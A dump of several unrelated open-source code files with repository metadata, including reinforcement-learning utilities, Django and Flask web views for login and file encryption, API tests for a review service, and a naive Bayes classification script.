dfde144f354340ed0365426e42f2d5d79a76425d | 5bf1de9330ef119f4ae9c1206c3bcf4bdbebbb20 | /src/Reinforcement_Learning/utils/model_utils.py | 157d94c7ecf6bd71fc4a09f14c57491c4242250d | [] | no_license | IanQS/blogpostcode | 44fbe128322a0eee5421062af585962bbbc33f14 | 489a89e5ec2d90f3c00e42cb9eb3d142d71d1882 | refs/heads/master | 2020-04-11T02:15:36.532722 | 2019-03-26T15:04:36 | 2019-03-26T15:04:36 | 161,439,760 | 2 | 2 | null | 2019-12-16T21:20:58 | 2018-12-12T05:57:15 | JavaScript | UTF-8 | Python | false | false | 1,526 | py | """
Utilities for the agent
- replay buffer
- OU noise
- etc
Author: Ian Q.
Notes:
"""
from collections import deque
import numpy as np
import numpy.random as nr
from operator import itemgetter
class ReplayBuffer():
    """Fixed-capacity FIFO store of transitions with uniform random sampling."""

    def __init__(self, size=10000):
        self.limit = size
        self.buffer = deque([], maxlen=self.limit)

    def sample(self, batch_size):
        """Return ``batch_size`` distinct transitions chosen uniformly."""
        population = np.arange(0, len(self.buffer))
        picks = np.random.choice(population, size=batch_size, replace=False)
        # itemgetter fetches all picked slots from the deque in one call
        return itemgetter(*picks.tolist())(self.buffer)

    def insert(self, transition):
        """Append a transition, evicting the oldest one when full."""
        self.buffer.append(transition)

    def clear(self):
        """Drop every stored transition while keeping the same capacity."""
        self.buffer = deque([], maxlen=self.limit)
class OUNoise():
    """Ornstein-Uhlenbeck process for temporally correlated exploration noise.

    Adapted from rllab's OU exploration strategy (Flood Sung, 2016.5.4):
    https://github.com/rllab/rllab/blob/master/rllab/exploration_strategies/ou_strategy.py
    """

    def __init__(self, action_dimension, mu=0, theta=0.15, sigma=0.2):
        self.action_dimension = action_dimension
        self.mu = mu          # long-run mean the process reverts to
        self.theta = theta    # mean-reversion rate
        self.sigma = sigma    # scale of the Gaussian perturbation
        self.state = np.ones(self.action_dimension) * self.mu
        self.reset()

    def reset(self):
        """Restart the process at its mean."""
        self.state = np.ones(self.action_dimension) * self.mu

    def noise(self):
        """Advance the process by one step and return the new state."""
        current = self.state
        drift = self.theta * (self.mu - current)
        diffusion = self.sigma * nr.randn(len(current))
        self.state = current + drift + diffusion
        return self.state
"itq@alumni.cmu.edu"
] | itq@alumni.cmu.edu |
ddaa1e1aeedc42417713853efc45458f1252fa0d | 833651f3d3e72ccc29559292387e33dd337b40b3 | /base_app/views.py | eb6a62bee30276df6a226893cfb92af823bc0ac0 | [] | no_license | yubhrraj/7SemMinorProj | 7fc2c1cf435c443f7d61ee0faf9ca3cb6092f909 | 7435879cac1c1dc7f0df52deed36752f0b39ff9c | refs/heads/master | 2020-04-09T13:25:35.742858 | 2018-12-06T13:39:03 | 2018-12-06T13:39:03 | 160,371,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,872 | py | from django.shortcuts import render
from django.http import HttpResponseRedirect, HttpResponse
from django.views.generic import View,TemplateView
from .forms import UserForm, linkform
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.contrib.auth import login,logout,authenticate
import pyAesCrypt
from .models import AppUser
from django.contrib.auth.models import User
bufferSize = 64 * 1024
class IndexView(TemplateView):
    """Public landing page: renders the static index template."""
    template_name = 'index.html'
@login_required
def user_logout(request):
    """Log the current user out and redirect to the landing page."""
    logout(request)
    return HttpResponseRedirect(reverse('index'))
def register(request):
    """Handle new-user signup.

    On POST, validates :class:`UserForm`, hashes the raw password via
    ``set_password`` and saves the user; on GET (or invalid POST) the
    form is (re-)rendered.  ``registered`` toggles the template's
    success message.
    """
    registered = False
    if request.method == "POST":
        user_form = UserForm(data=request.POST)
        if user_form.is_valid():
            user = user_form.save()
            # re-save with the password hashed (form stored it raw)
            user.set_password(user.password)
            user.save()
            registered = True
        else:
            print(user_form.errors)
    else:
        user_form = UserForm()
    return render(request, 'register.html', {'user_form': user_form, 'registered': registered})
def userlogin(request):
    """Authenticate a user from POSTed credentials.

    Redirects to the main page on success; returns a plain error
    response for inactive accounts or bad credentials.  GET renders
    the login form.
    """
    if request.method == 'POST':
        username = request.POST.get('username')
        password = request.POST.get('password')
        user = authenticate(username=username, password=password)
        if user:
            if user.is_active:
                login(request, user)
                return HttpResponseRedirect(reverse('base_app:main'))
            else:
                return HttpResponse("Account Not active")
        else:
            print("Well you Failed to login")
            return HttpResponse("Invalid Login Details")
    else:
        return render(request, 'login.html')
@login_required
def mainpage(request):
    """Logged-in landing page."""
    return render(request, 'loggedindex.html')

@login_required
def trainpage(request):
    """Training page (login required)."""
    return render(request, 'trainpage.html')

def testpage(request):
    # NOTE(review): unlike its siblings this view has no @login_required —
    # confirm whether anonymous access is intentional.
    return render(request, 'testpage.html')
@login_required
def encrypt(request):
    """Encrypt an uploaded file with the logged-in user's stored AES key.

    On POST, reads the 'upfile' upload and writes ciphertext to the
    hard-coded path "data.txt.aes"; always redirects to the main page.

    NOTE(review): pyAesCrypt is given ``uploaded_file.name`` (the
    client-side file name only), which works only if a file by that name
    exists in the server's working directory — confirm the upload is
    persisted to disk first.
    """
    if request.method == 'POST':
        password = request.user.appuser.key
        uploaded_file = request.FILES['upfile']
        # print(uploaded_file.name)
        pyAesCrypt.encryptFile(uploaded_file.name, "data.txt.aes", password, bufferSize)
        # pyAesCrypt.decryptFile("data.txt.aes", "dataout.txt", password, bufferSize)
    return HttpResponseRedirect(reverse('base_app:main'))
def decryptpage(request):
    """Decrypt an uploaded .aes file with the user's stored AES key.

    POST: decrypts the 'document' upload to the hard-coded path
    "dataout.txt" and redirects to the main page.  GET: renders the
    decrypt form.

    NOTE(review): this view has no @login_required yet it reads
    ``request.user.appuser.key`` — anonymous access would raise; confirm
    the decorator was not dropped by accident.
    """
    if request.method == 'POST':
        password = request.user.appuser.key
        uploaded_file = request.FILES['document']
        # print(uploaded_file.name)
        pyAesCrypt.decryptFile(uploaded_file.name, "dataout.txt", password, bufferSize)
        return HttpResponseRedirect(reverse('base_app:main'))
    return render(request, 'decryptpage.html')
| [
"yubhrraj.p@gmail.com"
] | yubhrraj.p@gmail.com |
68a1af811c9c0d813596a1ba7d0a197abe188521 | 77c3da51b6428d2d830648b5964d842ac96432ab | /03_basic_file_operation.py | 3695231e03894a75f8e03d6022eda9075848f192 | [] | no_license | rh13/i1-python_exercise_on_files | 2adc44db5819ab6de55cb63e5f17a754dfc25d6c | 850ad4eaf7ae95ab5c652f0212358c89f99036ef | refs/heads/master | 2020-03-07T10:45:46.412730 | 2018-03-30T14:54:36 | 2018-03-30T14:54:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169 | py | h=open("03_basic_read.txt","r")
with open('03_basic_file_operation.txt','w') as author:
for i in h:
a,b,c=i.split(",")
s="-".join((a,c))
author.write(s)
| [
"rhlikhon13@gmail.com"
] | rhlikhon13@gmail.com |
6dc727f287f4402d70fc96da1581c86a74d66922 | 399ccb8958b17e94d9cd4221bb16ce6ec0e4ccce | /museflow/__init__.py | 33df4447a16bcaae6711f028904c72288ff12e87 | [
"BSD-3-Clause"
] | permissive | tpt-adasp/museflow | de4d108eefe48f990decf60ef06a0c90b77346bf | e5642fd48687a6d3165e213eaab79d5d78d4c0d5 | refs/heads/master | 2022-12-31T06:25:04.094256 | 2020-10-21T21:17:04 | 2020-10-21T21:17:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 139 | py | import logging
import sys
logger = logging.getLogger('museflow') # pylint: disable=invalid-name
logger.addHandler(logging.NullHandler())
| [
"cifkao@users.noreply.github.com"
] | cifkao@users.noreply.github.com |
c5b2f86108ef15f5f1ac362a8347eaf8587e4578 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/adjectives/_considerable.py | 90514ebc212bd524acaa3c6e06d566fdda7c1fb1 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 405 | py |
#calss header
class _CONSIDERABLE():
def __init__(self,):
self.name = "CONSIDERABLE"
self.definitions = [u'large or of noticeable importance: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'adjectives'
def run(self, obj1, obj2):
self.jsondata[obj2] = {}
self.jsondata[obj2]['properties'] = self.name.lower()
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
93385eb9ba6fb78c134e86b1f2ce26787d68f5fd | 1148206c43cd123e624736be7ba325db5166c0b7 | /src/server/testing/test_reviews.py | bc57027dbbbe92b09bdcf8f54e1f5713c9acc6da | [] | no_license | DAPMElab/TBWA_Vendor_Portal | 6a66e0913abc57981be1b581e33760029b46cebb | 9b5094d5b2247dc14c016caa98aca668f65db023 | refs/heads/master | 2020-04-01T08:32:29.878264 | 2014-06-06T07:17:38 | 2014-06-06T07:17:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,622 | py |
import template
import json
import unittest
import rethinkdb as r
TABLE = 'reviews'
class TestReview(template.TestingTemplate):
""" Tests the API endpoints associated with handling reviews. """
    def __create_review(self, review={
            'Submitter': 'review submitter',
            'CompanyName': 'test_company',
            'Rating': 10}):
        """Insert a fixture company (id '123') and POST a review against it.

        Returns the new review's uid after asserting a 201 response.

        NOTE(review): the mutable-dict default argument is shared across
        calls; it is only read here, but a None default with an in-function
        dict would be safer.
        """
        outcome = r.table('companies').insert({
            'Company': 'Fake Company',
            'URL': 'Broken URL',
            'id': '123',
            'ReviewIds': []
        }).run(self.rdb)
        r_resp = self.request_with_role(
            '/review/create/123',
            method='POST',
            data=json.dumps(review)
        )
        self.assertEqual(r_resp.status_code, 201)
        return json.loads(r_resp.data)['uid']
    def test_create_success(self):
        """ Tests a successful review creation """
        # POST a well-formed review and expect 201 plus the confirmation
        # message in the JSON body
        review = {
            'Rating': 10,
            'Submitter': 'tester',
            'CompanyName': 'test_company'
        }
        resp = self.request_with_role('/review/create/123',
                method='POST',
                data=json.dumps(review))
        # testing creation
        self.assertEqual(resp.status_code, 201)
        resp_data = json.loads(resp.data)
        self.assertEqual(resp_data['message'], 'review created')
    def test_create_fail(self):
        """ Make a request w/o data """
        # POSTing with no body must be rejected with DATA_NEEDED_FOR_REQUEST
        resp = self.request_with_role('/review/create/123',
                method='POST')
        self.check_error(resp, 'DATA_NEEDED_FOR_REQUEST')
    def test_approve_success(self):
        """ Tests successfully updating a review to approved """
        # creating review
        rid = self.__create_review()
        # approving review
        resp = self.request_with_role('/review/approve/{}'.format(rid),
                method='POST')
        # testing approval
        self.assertEqual(resp.status_code, 200)
        approve_resp_data = json.loads(resp.data)
        self.assertEqual(approve_resp_data['message'], 'review approved')
        # fetch the review back and confirm the Approved flag flipped
        resp = self.request_with_role('/review/get/{}'.format(rid),
                method='GET')
        get_resp_data = json.loads(resp.data)
        self.assertTrue(get_resp_data['data']['Approved'])
def test_approve_fail(self):
""" Tests successfully updating a review to approved """
# approving review
resp = self.request_with_role('/review/approve/{}'.format('WRONG'),
method='POST')
# testing approval
self.assertEqual(resp.status_code, 400)
resp_data = json.loads(resp.data)
self.check_error(resp, 'REVIEW_APPROVAL_FAILURE')
def test_get_success(self):
""" Tests returning a review """
get_review = {
'Rating': 10,
'CompanyName': 'test_company',
'Reviewer': 'Anonymous',
'Approved': False
}
rid = self.__create_review(get_review)
# getting review
resp = self.request_with_role('/review/get/{}'.format(rid))
# testing response
self.assertEqual(resp.status_code, 200)
resp_data = json.loads(resp.data)['data']
del resp_data['CompanyID']
self.assertDictEqual(resp_data, get_review)
def test_get_fail(self):
""" Tests returning a review that doesn't exist """
# getting a non-existent review
resp = self.request_with_role(
'/review/get/{}'.format('nonexistent_reivew'), method='GET')
self.check_error(resp, 'REVIEW_NOT_FOUND')
def test_edit_success(self):
""" Test that a review properly updates """
# creating a review
review = {
'Rating':10,
'Submitter': 'tester',
'CompanyName': 'test_company'
}
resp = self.request_with_role('/review/create/123',
method='POST',
data=json.dumps(review))
rid = json.loads(resp.data)['uid']
# updating review
new_rating = 5
review['Rating'] = new_rating
edit_resp = self.request_with_role('/review/edit/{}'.format(rid),
method='PATCH', data=json.dumps(review))
self.assertEqual(edit_resp.status_code, 200)
# getting review
resp_get = self.request_with_role('/review/get/{}'.format(rid),
method='GET')
self.assertEqual(resp_get.status_code, 200)
data_get = json.loads(resp_get.data)
self.assertEqual(data_get['data']['Rating'], new_rating)
def test_edit_fail(self):
""" Test that /edit fails with a bad id """
resp = self.request_with_role(
'/review/edit/{}'.format('nonexistent_review'),
method='PATCH')
self.check_error(resp, 'DATA_NEEDED_FOR_REQUEST')
resp = self.request_with_role(
'/review/edit/{}'.format('nonexistent_review'),
method='PATCH',
data=json.dumps({'Mock':'data'}))
self.check_error(resp, 'REVIEW_NOT_FOUND')
def test_delete_success(self):
""" Test that a review is properly deleted """
# creating a review
rid = self.__create_review()
# deleting review
delete_resp = self.request_with_role('/review/delete/{}'.format(rid),
method='DELETE')
self.assertEqual(delete_resp.status_code, 202)
delete_data = json.loads(delete_resp.data)
self.assertEqual(delete_data['message'],
'review deleted')
# trying to get the review
resp = self.request_with_role('review/get/{}'.format(rid),
method='GET')
self.check_error(resp, 'REVIEW_NOT_FOUND')
def test_delete_fail(self):
""" Test that /delete properly fails when there's no id match """
num_before = r.table(TABLE).count().run(self.rdb)
# deleting review
resp = self.request_with_role('/review/delete/{}'.format('test'),
method='DELETE')
self.check_error(resp, 'REVIEW_NOT_FOUND')
# confirming no reviews were deleted
num_after = r.table(TABLE).count().run(self.rdb)
self.assertEqual(num_before, num_after)
def test_list_success(self):
""" Test that reviews that are unapproved are returned """
# creating reviews
reviews_list = [
{'Rating':5, 'Reviewer': 'Anonymous', 'CompanyName': 'test_company'},
{'Rating':2, 'Reviewer': 'Anonymous', 'CompanyName': 'test_company'},
{'Rating':8, 'Reviewer': 'Anonymous', 'CompanyName': 'test_company'},
]
for review in reviews_list:
resp = self.request_with_role('/review/create/123',
method='POST',
data=json.dumps(review))
self.assertEqual(resp.status_code, 201)
resp = self.request_with_role('review/list',
method='GET')
self.assertEqual(resp.status_code, 200)
resp_data = json.loads(resp.data)
# make sure the list at the very least has as many as we created
self.assertGreaterEqual(resp_data['count'], len(reviews_list))
# checking that all created reviews were returned
returned_list = resp_data['data']
for review in returned_list:
self.assertFalse(review['Approved'])
del review['CompanyID']
del review['id']
del review['Approved']
del review['Date']
for review in reviews_list:
self.assertIn(review, returned_list)
# Allow running this module directly: python test_reviews.py
if __name__ == '__main__':
    unittest.main()
| [
"natebrennand@gmail.com"
] | natebrennand@gmail.com |
3a2ea89e484f2726eccb65d1780abd6d75ab0039 | bd3edde39bb88bf007e778ccbe0f50876debf73d | /app/core/views.py | 4b2d84ea627e237e42e4cfc61cc80e2c604cc25f | [] | no_license | raidyue/parkinglot_flask | 7c8f954a0452e38e8d811ea9f9648d702bc7f590 | ecf4422d75da5105395138bb24934d3a3af187cb | refs/heads/master | 2021-01-10T04:54:37.730574 | 2015-12-03T06:48:45 | 2015-12-03T06:48:45 | 47,187,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,077 | py | # encoding=utf-8
from flask import Blueprint, render_template, request, session, url_for, redirect, flash
from app.models import User, db
# Blueprint registered by the app factory; all routes below attach to it.
main_bp = Blueprint('main', __name__)
@main_bp.route('/hello')
def hello():
    """Render the static hello-world demo page."""
    return render_template('helloworld.html')
@main_bp.route('/')
def index():
    """Home page; passes the logged-in username (or None) to the template."""
    current_user = session.get('username', None)
    return render_template('index.html', username=current_user)
@main_bp.route('/login', methods=['GET', 'POST'])
def login():
    """Log a user in.

    GET renders the login form; POST checks the submitted credentials and,
    on success, stores the username in the session and redirects home.

    Fixes two defects of the original: the password was never compared
    (any password logged in an existing user), and the raw username and
    password were printed to stdout.
    """
    if request.method == 'GET':
        return render_template('login.html')
    elif request.method == 'POST':
        username = request.form['username']
        password = request.form['password']
        # Match on username AND password (plain-text comparison, consistent
        # with how register() stores it); the original filtered by
        # username only, so the password was ignored entirely.
        user = db.session.query(User).filter_by(
            username=username, password=password).first()
        if user:
            session['username'] = user.username
            return redirect(url_for('.index'))
        else:
            flash(u'用户名或密码错误')
            return render_template('login.html')
    else:
        return url_for('.index')
@main_bp.route('/register', methods=['GET', 'POST'])
def register():
    """Register a new account (GET shows the form, POST creates the user)."""
    if request.method == 'GET':
        return render_template('register.html')
    elif request.method == 'POST':
        name = request.form['username']
        pwd = request.form['password']
        if User.is_exist(name):
            flash(u'该用户已存在')
            return render_template('register.html')
        # NOTE(review): the password is stored in plain text -- presumably a
        # demo; confirm whether hashing should be added.
        new_user = User(username=name, password=pwd)
        db.session.add(new_user)
        db.session.commit()
        session['username'] = name
        return redirect(url_for('.index'))
    else:
        return url_for('.index')
@main_bp.route('/logout')
def logout():
    """Remove the logged-in user from the session, then go home."""
    session.pop('username', None)  # no-op when nobody is logged in
    return redirect(url_for('.index'))
@main_bp.route('/add/<name>/<passwd>')
def create_user(name, passwd):
    """Debug helper: create a user straight from the URL path.

    NOTE(review): GET requests with credentials in the URL end up in server
    logs and browser history -- confirm this route is dev-only.
    """
    db.session.add(User(username=name, password=passwd))
    db.session.commit()
    return 'success'
| [
"yxd506388664@163.com"
] | yxd506388664@163.com |
60b4567896b5ba43ae28d30f439247b2cde8e8d8 | bc9008d7b1f6032f392c24b791965404847573de | /tarefa_3.py | f6b0681911a38e334cb611763d53e468321f0772 | [] | no_license | korallin/minicurso_nlp | e5c907314c356200fef89fcfa0bf24d342fb15ed | 3dfa9f241571674466932bce0f7878b437ece038 | refs/heads/master | 2023-07-14T05:18:06.548732 | 2019-10-04T12:20:23 | 2019-10-04T12:20:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,467 | py | # Ola vamos criar
import pickle
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.metrics import classification_report
from sklearn.tree import DecisionTreeClassifier
# Load the (item, label) pairs prepared earlier in the course.
# NOTE(review): pickle.load executes arbitrary code -- only open trusted files.
with open('itens.pkl', 'rb') as f_in:
    items = pickle.load(f_in)

print(f"Carregamos um conjunto com {len(items)} itens")

metade = int(len(items)/2)
X_test, y_test = zip(*items[:metade]) # first half held out for testing
X_train, y_train = zip(*items[metade:]) # the rest is used for training

# 'balanced' re-weights classes inversely to their frequency.
classifier = DecisionTreeClassifier(class_weight='balanced')
# We must turn each raw string into numeric features the classifier understands.
def convert_to_features(X):
    """Map each text item to a binary keyword-presence feature vector.

    Feature order: contains "LTDA", contains "JOAO", contains "ME".
    These are plain substring tests (so e.g. "NOME" also switches on the
    "ME" flag), exactly as in the original implementation.
    """
    keywords = ("LTDA", "JOAO", "ME")
    return [[1 if kw in item else 0 for kw in keywords] for item in X]
classifier.fit(convert_to_features(X_train), y_train)

# Evaluation ("Testes") on the held-out half.
predicted_labels = classifier.predict(convert_to_features(X_test))
target_names = ['pessoa', 'empresa']
print(classification_report(y_test, predicted_labels, target_names=target_names))
| [
"bruno@potelo.com.br"
] | bruno@potelo.com.br |
227c65532562036f5e133f80f39c5b3e37744a30 | 0214ce4dd9c8973751120ced006ec90ddc10e0e6 | /xepmts_staging/models/inline_response20029.py | f37d1190293987f4bcc393b0a61685193252124f | [] | no_license | jmosbacher/pmts-staging-api-client | b9b4175a8ab52bd1c22a2845ab564cd0bd4d2e1c | d25cacc6c75b5d716414e08184c4a6bc205126f9 | refs/heads/master | 2022-11-08T09:18:38.371104 | 2020-07-01T14:52:46 | 2020-07-01T14:52:46 | 276,405,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,341 | py | # coding: utf-8
"""
PMT API
API for the XenonnT PMT database # noqa: E501
The version of the OpenAPI document: 0.1
Contact: joe.mosbacher@gmail.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from xepmts_staging.configuration import Configuration
class InlineResponse20029(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    openapi_types = {
        'items': 'list[XenonntTpcPmt]'
    }

    attribute_map = {
        'items': '_items'
    }

    def __init__(self, items=None, local_vars_configuration=None):  # noqa: E501
        """InlineResponse20029 - a model defined in OpenAPI"""  # noqa: E501
        if local_vars_configuration is None:
            local_vars_configuration = Configuration()
        self.local_vars_configuration = local_vars_configuration

        self._items = None
        self.discriminator = None

        if items is not None:
            self.items = items

    @property
    def items(self):
        """Gets the items of this InlineResponse20029.  # noqa: E501


        :return: The items of this InlineResponse20029.  # noqa: E501
        :rtype: list[XenonntTpcPmt]
        """
        return self._items

    @items.setter
    def items(self, items):
        """Sets the items of this InlineResponse20029.


        :param items: The items of this InlineResponse20029.  # noqa: E501
        :type: list[XenonntTpcPmt]
        """

        self._items = items

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively serialise nested models (anything with a to_dict),
        # including models held inside lists and dict values.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, InlineResponse20029):
            return False

        return self.to_dict() == other.to_dict()

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        if not isinstance(other, InlineResponse20029):
            return True

        return self.to_dict() != other.to_dict()
| [
"joe.mosbacher@gmail.com"
] | joe.mosbacher@gmail.com |
c7040ddfb3234fa81c557c5b53c237e3a8c31aeb | 884bcd609959b27748570d3ea6b1b0942126db73 | /03 Longest Substring Without Repeating Characters.py | 24922e5c5625309f911402a9a1f557c4c58fbc09 | [] | no_license | hemxzp/leetcode | 9a7dbe94849ea51ee6b51fd3cb6238b37584aa87 | bf243269810869d28c7484667f46fb1cc0464005 | refs/heads/master | 2020-04-01T19:50:03.994795 | 2018-12-10T13:02:45 | 2018-12-10T13:02:45 | 153,573,868 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 547 | py | # -*- coding:utf-8 _*_
class Solution:
    def lengthOfLongestSubstring(self, s):
        """
        :type s: str
        :rtype: int

        Sliding window kept as a list of the current duplicate-free run.
        """
        if not s:
            return 0
        best = 1
        window = []  # characters of the current repeat-free substring
        for ch in s:
            if ch in window:
                # Drop the prefix up to and including the earlier ch.
                window = window[window.index(ch) + 1:]
            window.append(ch)
            if len(window) > best:
                best = len(window)
        return best
# Ad-hoc smoke test; expected output: 3 (longest run "wke").
ob=Solution()
print(ob.lengthOfLongestSubstring('pwwkew'))
| [
"1316437633@qq.com"
] | 1316437633@qq.com |
ca9d516a63d3e04ca632b57273b2672ee116ff83 | 393cd5f71ba672a532a70452fdd945b7d890ca8c | /codes/naive_bayes.py | 83fb15af04856f8d543fe14036f5e6c6bd44b142 | [
"MIT"
] | permissive | kushalsatya11/Automatic-Code-Complexity-Prediction | ccf8756b9d2e9a2703bfd45949753d2b9e4baab2 | b4e2b12896ac0b420232ebb330c8338bd12c2d8e | refs/heads/master | 2021-06-17T20:32:15.237225 | 2019-09-25T07:01:33 | 2019-09-25T07:01:33 | 203,235,119 | 0 | 1 | MIT | 2021-04-26T19:26:05 | 2019-08-19T19:17:52 | Java | UTF-8 | Python | false | false | 2,251 | py | import csv
import numpy as np
from sklearn.cluster import KMeans
from sklearn import tree
from sklearn.metrics import accuracy_score
from sklearn.naive_bayes import BernoulliNB
import matplotlib
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
from sklearn.model_selection import KFold
from scipy.stats import mode
from sklearn.utils import shuffle
from sklearn.metrics import precision_score, recall_score
from sklearn.feature_selection import SelectFromModel
arr = []                 # feature rows (14 raw string columns per sample)
arr_complexities = []    # numeric class labels, via complexity_dictionary
arr_names = []           # sample (file) names, aligned with arr

complexity_dictionary = {'n':0, 'n_square':1, 'logn':2, 'nlogn':3, '1':4}
color_mapping = {0:'r', 1:'g', 2:'b', 3:'y', 4:'m'}
file_to_complexity_mapping = {}

with open('./finalFeatureData.csv','rt') as f:
    data = csv.reader(f)
    count = 0
    for row in data:
        count = count + 1
        if count == 1:  # skip the header row
            continue
        name = row[-1]
        features = row[0:14]
        complexity = row[-2]
        # BUG FIX: the original test was `complexity==('n' or 'n_square')`,
        # which evaluates to `complexity=='n'` because a parenthesised `or`
        # returns its first truthy operand -- so 'n_square' rows were never
        # skipped. A membership test expresses the evident intent.
        if complexity in ('n', 'n_square'):
            continue
        # (the original also had a no-op `for i in features: i = (int)(i)`
        # loop; the real conversion happens below via np.asarray(dtype=float))
        arr_names.append(name)
        arr.append(features)
        arr_complexities.append(complexity_dictionary[complexity])

arr = np.asarray(arr, dtype=float)
arr_complexities = np.asarray(arr_complexities)

# shuffle the data (fixed seed keeps runs reproducible)
arr, arr_complexities, arr_names = shuffle(arr, arr_complexities, arr_names, random_state=0)

no_of_variables = 14
scores = []
precisions = []
recalls = []
# Train a Bernoulli naive Bayes on the first i features, for growing i.
for i in range(1, no_of_variables):
    array = arr[:, :i]
    score = []
    prec = []
    rec = []
    kf = KFold(n_splits=5, shuffle=True)
    for train_index, test_index in kf.split(array, arr_complexities):
        X_train, X_test = array[train_index], array[test_index]
        y_train, y_test = arr_complexities[train_index], arr_complexities[test_index]
        gnb = BernoulliNB()
        gnb.fit(X_train, y_train)
        y_predicted = gnb.predict(X_test)
        acc_score = accuracy_score(y_test, y_predicted)
        score.append(acc_score)
        prec.append(precision_score(y_test, y_predicted, average='weighted'))
        rec.append(recall_score(y_test, y_predicted, average='weighted'))
    # NOTE(review): this records the *best* fold rather than the mean;
    # mean +/- std is the usual cross-validation summary.
    scores.append(max(score))
    precisions.append(max(prec))
    recalls.append(max(rec))

plt.plot(scores)
plt.savefig('nb_vs_vaiable_count.png')  # (filename typo kept for compatibility)
print('Scores: ', scores)
| [
"shagun16088@iiitd.ac.in"
] | shagun16088@iiitd.ac.in |
203fa172f84ee4e08171567c7f92913a36514a6f | 0bbadd843b28df32fdb22f027f06313ebff8d839 | /es_index_create.py | 5fdb1d50457074c49640905072b50ef72d6a162a | [] | no_license | Quastrado/text_search_engine | 5ce256b34d056c177f7e3e9e2b534485a9ebb70e | 8ee8ab221307597d5075f2d0f5aca7d053a10639 | refs/heads/master | 2023-06-17T03:47:24.482037 | 2021-06-13T13:14:27 | 2021-06-13T13:14:27 | 372,085,035 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py | import json
from elasticsearch import Elasticsearch
from app.actions import BaseActions
from app.models import Post
from app.db.session import SessionLocal
# actions = BaseActions(Post)

# Pull every Post row; the Elasticsearch indexing below is currently disabled.
session = SessionLocal()
posts = session.query(Post).all()

# es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
# i = 0
# for instance in posts:
#     body = json.dumps(instance.__dict__)
#     es.index(index='posts', doc_type='_doc', id=i, body=body)
#     i = i+1
| [
"Ataxyswriter@yandex.com"
] | Ataxyswriter@yandex.com |
fd1464a1341d4c5adf11605e34d1f027dd436fee | ff7a68c14d3139e199453d1c24874ee3af392fd9 | /utils/testll.py | 48e33d04cff34695f00702512de0068c030a0858 | [
"CC0-1.0"
] | permissive | patrickmmartin/owictrl | 0ce74aefc63abdac90d10a221bfd61979b004046 | c8ef7244a032b40a6ab4dac22fbed3e7f2902d5e | refs/heads/master | 2021-01-22T07:39:14.869943 | 2017-06-16T16:16:29 | 2017-06-16T16:16:29 | 28,648,848 | 1 | 0 | null | 2017-06-16T16:16:30 | 2014-12-30T23:18:29 | Python | UTF-8 | Python | false | false | 2,124 | py | #! /usr/bin/python
""" test cases for the mini language output """
import unittest
import edgelang
import edgell
class EdgeLangBaseTestCase(unittest.TestCase):
    """ base class with setUp """
    # Expected byte triples from edgell.to_bytes; the third byte appears to
    # be the LED flag (see the LED test cases below) -- TODO confirm.
    _blank_move = [0, 0, 0]
    _LED_only = [0, 0, 1]
    def setUp(self):
        pass
class EdgeLangLLTestCase(EdgeLangBaseTestCase):
    """ a lone duration directive compiles to the all-zero move """
    def runTest(self):
        """ implement runTest"""
        program = edgelang.to_ll("D1.0")
        self.assertEqual(edgell.to_bytes(program[0]), self._blank_move)
class EdgeLangLLTestResultCase(EdgeLangBaseTestCase):
    """ motor directives with a duration still yield the blank move bytes """
    def runTest(self):
        """ implement runTest"""
        program = edgelang.to_ll("M1+,M2-,D1.0")
        self.assertEqual(edgell.to_bytes(program[0]), self._blank_move)
class EdgeLangLLLEDOffTestCase(EdgeLangBaseTestCase):
    """ L0 (LED off) compiles to the all-zero move """
    def runTest(self):
        """ implement runTest"""
        program = edgelang.to_ll(" L0 , D1 ")
        self.assertEqual(edgell.to_bytes(program[0]), self._blank_move)
class EdgeLangLLLEDOnTestCase(EdgeLangBaseTestCase):
    """ L1 (LED on) sets only the LED byte """
    def runTest(self):
        """ implement runTest"""
        program = edgelang.to_ll(" L1 , D1 ")
        self.assertEqual(edgell.to_bytes(program[0]), self._LED_only)
